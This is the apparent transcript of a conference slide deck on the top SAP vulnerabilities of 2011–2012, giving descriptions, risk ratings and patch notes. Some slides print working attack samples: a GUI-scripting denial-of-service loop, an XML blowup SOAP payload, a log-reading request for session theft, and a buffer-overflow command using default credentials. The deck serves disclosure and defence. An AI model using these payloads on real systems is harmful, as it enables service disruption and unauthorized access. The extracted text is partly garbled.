sap (in)security: new and best
TRANSCRIPT
Invest in security to secure investments
SAP (In)Security: New and Best
Alexander Polyakov. CTO at ERPScan
1
About ERPScan
• The only 360-‐degree SAP Security soluHon -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presenta>ons key security conferences worldwide • 25 Awards and nomina>ons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
What is SAP ?
Shut up And Pay
3
Really
• The most popular business applicaHon • More than 120000 customers • 74% of Forbes 500
4
Agenda
• Intro • SAP security history • SAP on the Internet • Most popular SAP issues (OLD) • Top 10 latest interesHng a[acks (NEW) • DEMOs • Conclusion
5
6
3 areas of SAP Security
2010 Applica3on pla4orm security
Prevents unauthorized access both insiders and remote a3ackers
SoluHon: Vulnerability Assessment and Monitoring
2008
ABAP Code security Prevents a3acks or mistakes made by developers SoluHon: Code audit
2002
Business logic security (SOD) Prevents a3acks or mistakes made SoluHon: GRC
0
5
10
15
20
25
30
35
2006 2007 2008 2009 2010 2011 2012
Most popular: • BlackHat • HITB • Troopers • RSA • Source • DeepSec • etc.
Talks about SAP security
7
0
100
200
300
400
500
600
700
800
900
2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012
By April 26, 2012, a total of 2026 notes
SAP Security notes
8
0 50 100 150 200 250 300 350
12 -‐SQL Inj
11 -‐ BOF
10 -‐ Denial of service
9 -‐ Remote Code ExecuHon
8 -‐ Verb tampering
7 -‐ Code injecHon vulnerability
6 -‐ Hard-‐coded credenHals
5 -‐ Unauthorized usage of applicaHon
4 -‐ InformaHon Disclosure
3 -‐ Missing Auth check
2 -‐ XSS/Unauthorised modificaHon of
1 -‐ Directory Traversal
Stats from : • 1Q 2012 • 1Q 2010 • 4Q 2009
SAP vulnerabili>es by type
9
Top problems by OWASP-‐EAS (Implementa>on issues)
• EASAI-‐1 Lack of patch management • EASAI-‐2 Default Passwords for applicaHon access • EASAI-‐3 SOD conflicts • EASAI-‐4 Unnecessary Enabled ApplicaHon features • EASAI-‐5 Open Remote management interfaces • EASAI-‐6 lack of password lockout/complexity checks • EASAI-‐7 Insecure opHons • EASAI-‐8 Unencrypted communicaHons • EASAI-‐9 Insecure trust relaHons • EASAI-‐10 Guest access
10
Top problems by BIZEC
• BIZEC TEC-‐01: Vulnerable Sojware in Use • BIZEC TEC-‐02: Standard Users with Default Passwords • BIZEC TEC-‐03: Unsecured SAP Gateway • BIZEC TEC-‐04: Unsecured SAP/Oracle authenHcaHon • BIZEC TEC-‐05: Insecure RFC interfaces • BIZEC TEC-‐06: Insufficient Security Audit Logging • BIZEC TEC-‐07: Unsecured SAP Message Server • BIZEC TEC-‐08: Dangerous SAP Web ApplicaHons • BIZEC TEC-‐09: Unprotected Access to AdministraHon Services • BIZEC TEC-‐10: Insecure Network Environment • BIZEC TEC-‐11: Unencrypted CommunicaHons
11
Business Risks
Espionage • Stealing financial informaHon • Stealing corporate secrets • Stealing suppliers and customers list • Stealing HR data
Sabotage • Denial of service • ModificaHon of financial reports • Access to technology network (SCADA) by trust relaHons Fraud • False transacHons • ModificaHon of master data • e.t.c.
12
SAP on the Internet
MYTH: SAP systems a^acks available only for insiders
• We have collected data about SAP systems in the WEB • Have various stats by countries, applicaHons, versions • InformaHon from Google, Shodan, Nmap scan
13
SAP on the Internet
14
About 5000 systems including Dispatcher, Message server, SapHostcontrol, Web-‐ services
SAP on the Internet
15
Top 10 vulnerabili>es 2011-‐2012
1. AuthenHcaHon Bypass via Verb tampering 2. AuthenHcaHon Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execuHon via TH_GREP 5. MMC read SESSIONID 6. Remote portscan 7. EncrypHon in SAPGUI 8. BAPI XSS/SMBRELAY 9. XML Blowup DOS 10. GUI ScripHng DOS
NNw NNw
NNw
NNw
NNw
16
10 – GUI-‐Scrip>ng DOS: Descrip>on
• SAP users can run scripts which automate their user funcHons • A script has the same rights in SAP as the user who launched it • Security message which is shown to user can be turned off in
the registry • Almost any user can use SAP Messages (SM02 transacHon) • It is possible to run DOS a[ack on any user using a simple script
New
Author: Dmitry Chastukhin (ERPScan)
17
10 – GUI-‐scrip>ng: Details
If Not IsObject(application) Then Set SapGuiAuto = GetObject("SAPGUI") Set application = SapGuiAuto.GetScriptingEngine End If If Not IsObject(connection) Then Set connection = application.Children(0) End If If Not IsObject(session) Then Set session = connection.Children(0) End If If IsObject(WScript) Then WScript.ConnectObject session, "on" WScript.ConnectObject application, "on" End If do a=a+1 session.findById("wnd[0]").maximize session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02" session.findById("wnd[0]/tbar[0]/btn[0]").press session.findById("wnd[0]/tbar[1]/btn[34]").press session.findById("wnd[1]/usr/txtEMLINE1").text = "hello" session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]").sendVKey 4 session.findById("wnd[2]/usr/lbl[1,3]").setFocus session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15 session.findById("wnd[2]").sendVKey 2 session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2 session.findById("wnd[1]/tbar[0]/btn[0]").press Loop Until a>=1000
18
10 – GUI-‐scrip>ng: Other a^acks
Other a^acks like changing banking accounts in LFBK also possible
Script can be uploaded using: • SAPGUI AcHveX vulnerability • Teensy USB flash • Any other method of client exploitaHon
19
10 – GUI-‐scrip>ng: Business risks
Ease of exploita>on – Medium
Sabotage – High
Espionage – No
Fraud – No
20
10 – GUI-‐scrip>ng: Preven>on
• SAP GUI ScripHng Security Guide • sapgui/user_scripHng = FALSE • Block registry modificaHon on workstaHons
21
9 – XML Blowup DOS: Descrip>on
• WEBRFC interface can be used to run RFC funcHons • By default any user can have access • Can execute at least RFC_PING • SAP NetWeaver is vulnerable to malformed XML packets • It is possible to run DOS a[ack on server using simple script • It is possible to run over the Internet!
New
Author: Alexey Tyurin (ERPScan)
22
9 – XML Blowup DOS: Details
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body><m:RFC_PING
xmlns:m="urn:sap-com:document:sap:rfc:functions\"
a1="" a2="" ... a10000="" > </m:RFC_PING>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
23
9 – XML Blowup DOS: Business risks
Ease of exploita>on – Medium
Espionage – No
Fraud – No
Sabotage – Cri>cal
24
9 – XML Blowup DOS: Preven>on
• Disable WEBRFC • Prevent unauthorized access to WEBRFC using S_ICF • Install SAP notes 1543318 and 1469549
25
Author: Dmitry Chastukhin (ERPScan)
8 – BAPI script injec>on/hash stealing : Descrip>on
• SAP BAPI transacHon fails to properly saniHze input • Possible to inject JavaScript code or link to a fake SMB server • SAP GUI clients use Windows so their credenHals will be
transferred to a[ackers host.
26
New
8 – BAPI script injec>on/hash stealing: Demo
27
Ease of exploita>on – Low
Sabotage – High
Espionage – High
Fraud – High
8 – BAPI script injec>on/hash stealing: Business risks
28
7 – SAP GUI bad encryp>on: Descrip>on
• SAP • SAP FrontEnd can save encrypted passwords in shortcuts
• Shortcuts stored in .sap file • This password uses byte-‐XOR algorithm with “secret” key • Key has the same value for every installaHon of SAP GUI • Any password can be decrypted in 1 second
Author: Author: Alexey Sintsov (ERPScan
New
7 – SAP GUI bad encryp>on: Demo
30
7 – SAP GUI bad encryp>on: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploita>on – Medium
31
7 – SAP GUI bad encryp>on: Preven>on
• Disable password storage in GUI
32
6 – Remote port scan via JSP: Descrip>on
• It is possible to scan internal network from the Internet • Authen>ca>on is not required • SAP NetWeaver J2EE engine is vulnerable
• /ipcpricing/ui/BufferOverview.jsp? • server=172.16.0.13 • & port=31337 • & password= • & dispatcher= • & targetClient= • & view=
Author: Alexander Polyakov (ERPScan)
33
6 – Remote port scan via JSP: Demo
Port closed
HTTP port
SAP port
34
6 – Remote port scan via JSP: Business risks
Ease of exploita>on – High
Espionage – Medium
Fraud – No
Sabotage – Low
35
6 – Remote port scan via JSP: Preven>on
• Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883
• Disable unnecessary applicaHons
36
5 – MMC JSESSIONID stealing: Descrip>on
• Remote management of SAP Plaworm • By default, many commands go without auth • Exploits implemented in Metasploit (by ChrisJohnRiley) • Most of the bugs are informaHon disclosure • It is possible to find informaHon about JSESSIONID • Only if trace is ON
Can be authen>cated as an exis>ng user remotely
1) Original bug by ChrisJohnRiley 2) JSESSIONID by Alexey Sintsov and
Alexey Tyurin (ERPScan)
New
37
5 – MMC SESSIONID stealing: Details
<?xml version="1.0" encoding="UTF-8" ?> <SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://
www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess = "http://
www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession>
</sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/
userinterface.log</filename> <filter></filter> <language></language> <maxentries>100</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
38
5 – MMC JSESSIONID stealing: Business risks
Espionage – Cri>cal
Sabotage – Medium
Fraud – High
Ease of exploita>on – Medium
39
5 – MMC JSESSIONID stealing: Preven>on
• The JSESSIONID by default will not be logged in log file • Don’t use TRACE_LEVEL = 3 on producHon systems or delete
traces ajer use • Other info h[p://help.sap.com/saphelp_nwpi71/helpdata/
en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
40
• RCE vulnerability in RFC module TH_GREP • Found by Joris van de Vis • SAP was not properly patched (1433101) • We have discovered that the patch can be bypassed in Windows
Origina l bug by Joris van de Vis (erp-‐sec) Bypass by Alexey Tyurin (ERPScan)
4 – Remote command execu>on in TH_GREP: Descrip>on
41
4 – RCE in TH_GREP: Details
elseif opsys = 'Windows NT'.
concatenate '/c:"' string '"' filename into
grep_params in character mode.
else. /*if linux*/
/* 185 */ replace all occurrences of '''' in local_string with '''"''"'''. /* 186 */ concatenate '''' local_string '''' filename into grep_params /* 187*/ in character mode. /* 188*/ endif.
/* 188*/
42
4 – RCE in TH_GREP: Demo #1
43
4 -‐ RCE in TH_GREP: More details
4 ways to execute vulnerable program • Using transacHon "Se37“ • Using transacHon “SM51“ (thanks to Felix Granados) • Using remote RFC call "TH_GREP" • Using SOAP RFC call "TH_GREP" via web
44
4 – RCE in TH_GREP: Demo #2
45
4 – RCE in TH_GREP: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploita>on – medium
46
4 – RFC in TH_GREP: Preven>on
• Install SAP notes 1580017, 1433101 • Prevent access to criHcal transacHons and RFC funcHons • Check the ABAP code of your Z-‐transacHons for similar vulnerabiliHes
47
3 -‐ ABAP Kernel BOF: Descrip>on
• Presented by Andreas Wiegenstein at BlackHat EU 2011 • Buffer overflow in SAP kernel funcHon C_SAPGPARAM • When NAME field is more than 108 chars • Can be exploited by calling an FM which uses C_SAPGPARAM • Example of report – RSPO_R_SAPGPARAM
Author: (VirtualForge)
48
3 -‐ABAP Kernel BOF: Details
> startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 –u SAP* -p 11111 -F RSPO_R_SAPGPARAM
-E NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -t 4
RFC Call/Exception: SYSTEM_FAILURE
Group Error group 104 Key RFC_ERROR_SYSTEM_FAILURE Message connection closed without message (CM_NO_DATA_RECEIVED)
49
3 – ABAP Kernel BOF: Business risks
Ease of exploita>on – Medium
Espionage – Cri>cal
Fraud – Cri>cal
Sabotage – Cri>cal
50
3 – ABAP Kernel BOF: Preven>on
• Install SAP notes: - 1493516 – CorrecHng buffer overflow in ABAP system call - 1487330 – PotenHal remote code execuHon in SAP Kernel
• Prevent access to criHcal transacHons and RFC funcHons • Check the ABAP code of your Z-‐transacHons for criHcal calls
51
2 – Invoker Servlet: Descrip>on
• Rapidly calls servlets by their class name • Published by SAP in their security guides • Possible to call any servlet from the applicaHon • Even if it is not declared in WEB.XML
Can be used for auth bypass
52
2 -‐ Invoker Servlet: Details
<servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet-class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> Author: Dmitry Chastukhin (ERPScan)
What if we call /servlet/com.sap.admin.Cri>cal.Ac>on
53
2 – Invoker servlet: Business risks
Ease of use – Very easy!
Espionage – High
Sabotage – High
Fraud – High
54
2 -‐ Invoker servlet: Preven>on
• Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” property of the
servlet_jsp must be “false” If you can’t install patches for some reason, you can check all WEB.XML files using ERPScan web.xml scanner manually.
55
1 – VERB Tampering
56
1st Place – Verb Tampering
<security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>
What if we use HEAD instead of GET ?
Author: Alexander Polyakov (ERPScan)
57
1st Place – Verb tampering: Details
Remotely without authen>ca>on!
• CTC – Secret interface for managing J2EE engine • Can be accessed remotely • Can run user management acHons:
– Add users – Add to groups – Run OS commands – Start/Stop J2EE
58
1 – Verb tampering: Demo
59
1 – Verb tampering: More details
If patched, can be bypassed by the Invoker servlet!
60
1 – Verb tampering: Business risks
Espionage – Cri>cal
Sabotage – Cri>cal
Fraud – Cri>cal
Ease of use – Very easy!
61
PrevenHon: • Install SAP notes 1503579,1616259 • Install other SAP notes about Verb Tampering (about 18) • Scan applicaHons using ERPScan WEB.XML check tool or
manually • Secure WEB.XML by deleHng all <h[p-‐method> • Disable the applicaHons that are not necessary
1st Place – Verb tampering: Preven>on
62
Conclusion
It is possible to be protected from almost all those kinds of issues and we are working hard with SAP to make it secure
SAP Guides
It’s all in your hands
Regular Security assessments
ABAP Code review
Monitoring technical security
Segrega>on of Du>es
63
Future work
Many of the researched things cannot be disclosed now because of our good relaHonship with SAP Security Response Team, whom I would like to thank for cooperaHon. However, if you want to see new demos and 0-‐days, follow us at @erpscan and a[end the
future presentaHons:
• Just4MeeHng in July (Portugal) • BlackHat USA in July (Las Vegas)
64
Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.
65